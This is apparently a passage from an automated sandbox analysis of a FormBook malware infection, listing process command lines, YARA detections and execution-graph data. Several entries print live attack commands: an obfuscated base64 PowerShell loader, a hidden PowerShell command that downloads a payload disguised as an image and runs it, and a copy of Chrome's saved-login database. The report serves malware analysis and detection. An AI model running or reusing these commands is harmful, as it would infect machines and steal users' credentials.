eYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTr
ebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTr
eZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQ
DgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHcDgTreQgBVDgTreGcDgTrecDgTreDgTre2DgTreHEDgTreeQBzDgTreEYDgTreNQDgTre4DgTreGkDgTreSgBBDgTreCEDgTrePQB5DgTreGUDgTreawBoDgTreHQDgTredQBhDgTreCYDgTreMgDgTrexDgTreDEDgTreMQDgTreyDgTreCUDgTreMDgTreDgTre4DgTreDEDgTreNgDgTre4DgTreEMDgTreMwBDDgTreDQDgTreRgDgTrezDgTreDYDgTreRgDgTre2DgTreEUDgTreNDgTreDgTre9DgTreGQDgTreaQBzDgTreGUDgTrecgDgTre/DgTreGQDgTreYQBvDgTreGwDgTrebgB3DgTreG8DgTreZDgTreDgTrevDgTreG0DgTrebwBjDgTreC4DgTreZQB2DgTreGkDgTrebDgTreDgTreuDgTreGUDgTredgBpDgTreHIDgTreZDgTreBlDgTreG4DgTrebwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:21:11:14
Start date:18/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:21:11:15
Start date:18/04/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:21:11:26
Start date:18/04/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Imagebase:0x2a0000
File size:262'432 bytes
MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:21:11:26
Start date:18/04/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Imagebase:0x8b0000
File size:262'432 bytes
MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate
Has exited:true

Target ID:6
Start time:21:11:26
Start date:18/04/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:false

Target ID:8
Start time:21:11:31
Start date:18/04/2024
Path:C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:0xe0000
File size:86'528 bytes
MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                Start time:21:11:36
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                Start time:21:11:36
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                Start time:21:11:48
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2266027879.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b800000_powershell.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9678f6b68ba26b14af2d1c4a208d741aea42871c2c9e7adfba0676239879714c
                                                                                                                                                                                                                                                                  • Instruction ID: 4527fd586dea0d27192c03b38eff8d019123b43e89e37b519467d7e121d1f367
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9678f6b68ba26b14af2d1c4a208d741aea42871c2c9e7adfba0676239879714c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7701A77021CB0C8FD748EF0CE051AAAB3E0FF99360F10056DE58AC36A1D632E882CB41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:1.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.9%
                                                                                                                                                                                                                                                                  Signature Coverage:5.9%
                                                                                                                                                                                                                                                                  Total number of Nodes:555
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:71
40c312 81844 40f490 81842->81844 81845 40f4ad 81844->81845 82009 419fb0 81845->82009 81848 40f4f5 81848->81362 81849 41a000 2 API calls 81850 40f51e 81849->81850 81850->81362 81852 41af50 LdrLoadDll 81851->81852 81853 41a01c 81852->81853 82015 13c2d10 LdrInitializeThunk 81853->82015 81854 40c375 81854->81368 81854->81371 81857 41af50 LdrLoadDll 81856->81857 81858 41a06c 81857->81858 82016 13c2d30 LdrInitializeThunk 81858->82016 81859 40c449 81859->81379 81862 41af50 LdrLoadDll 81861->81862 81863 419e2c 81862->81863 82017 13c2fb0 LdrInitializeThunk 81863->82017 81864 40c49c 81864->81383 81866->81828 81867->81825 81869 407ea0 4 API calls 81868->81869 81884 4087ba 81868->81884 81869->81884 81870 408a49 81870->81834 81870->81836 81871 408a3f 81872 408160 2 API calls 81871->81872 81872->81870 81875 419ef0 2 API calls 81875->81884 81877 41a480 LdrLoadDll NtClose 81877->81884 81880 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81880->81884 81883 419e10 2 API calls 81883->81884 81884->81870 81884->81871 81884->81875 81884->81877 81884->81880 81884->81883 81887 419d00 81884->81887 81890 4085d0 81884->81890 81902 40f5e0 LdrLoadDll NtClose 81884->81902 81903 419d80 LdrLoadDll 81884->81903 81904 419db0 LdrLoadDll 81884->81904 81905 419e40 LdrLoadDll 81884->81905 81906 4083a0 81884->81906 81922 405f60 LdrLoadDll 81884->81922 81886->81834 81888 41af50 LdrLoadDll 81887->81888 81889 419d1c 81887->81889 81888->81889 81889->81884 81891 4085e6 81890->81891 81923 419870 81891->81923 81893 4085ff 81898 408771 81893->81898 81944 4081a0 81893->81944 81895 4086e5 81896 4083a0 11 API calls 81895->81896 81895->81898 81897 408713 81896->81897 81897->81898 81899 419ef0 2 API calls 81897->81899 81898->81884 81900 408748 81899->81900 81900->81898 81901 41a4f0 2 API calls 81900->81901 81901->81898 81902->81884 81903->81884 81904->81884 81905->81884 81907 4083c9 81906->81907 81987 408310 81907->81987 81910 41a4f0 2 API calls 81911 4083dc 81910->81911 
81911->81910 81912 408467 81911->81912 81915 408462 81911->81915 81995 40f660 81911->81995 81912->81884 81913 41a480 2 API calls 81914 40849a 81913->81914 81914->81912 81916 419d00 LdrLoadDll 81914->81916 81915->81913 81917 4084ff 81916->81917 81917->81912 81999 419d40 81917->81999 81919 408563 81919->81912 81920 414a40 8 API calls 81919->81920 81921 4085b8 81920->81921 81921->81884 81922->81884 81924 41bf90 2 API calls 81923->81924 81925 419887 81924->81925 81951 409310 81925->81951 81927 4198a2 81928 4198e0 81927->81928 81929 4198c9 81927->81929 81932 41bd40 2 API calls 81928->81932 81930 41bdc0 2 API calls 81929->81930 81931 4198d6 81930->81931 81931->81893 81933 41991a 81932->81933 81934 41bd40 2 API calls 81933->81934 81935 419933 81934->81935 81941 419bd4 81935->81941 81957 41bd80 81935->81957 81938 419bc0 81939 41bdc0 2 API calls 81938->81939 81940 419bca 81939->81940 81940->81893 81942 41bdc0 2 API calls 81941->81942 81943 419c29 81942->81943 81943->81893 81945 40829f 81944->81945 81946 4081b5 81944->81946 81945->81895 81946->81945 81947 414a40 8 API calls 81946->81947 81948 408222 81947->81948 81949 41bdc0 2 API calls 81948->81949 81950 408249 81948->81950 81949->81950 81950->81895 81952 409335 81951->81952 81953 40ace0 LdrLoadDll 81952->81953 81954 409368 81953->81954 81956 40938d 81954->81956 81960 40cf10 81954->81960 81956->81927 81981 41a570 81957->81981 81961 40cf3c 81960->81961 81962 41a1d0 LdrLoadDll 81961->81962 81963 40cf55 81962->81963 81964 40cf5c 81963->81964 81971 41a210 81963->81971 81964->81956 81966 40cf7f 81966->81964 81978 41a800 LdrLoadDll 81966->81978 81968 40cf97 81969 41a480 2 API calls 81968->81969 81970 40cfba 81969->81970 81970->81956 81972 41a22c 81971->81972 81973 41af50 LdrLoadDll 81971->81973 81979 13c2ca0 LdrInitializeThunk 81972->81979 81973->81972 81974 41a247 81974->81966 81980 13c2ea0 LdrInitializeThunk 81974->81980 81975 41a28b 81975->81966 81978->81968 81979->81974 81980->81975 81982 41af50 LdrLoadDll 81981->81982 81983 
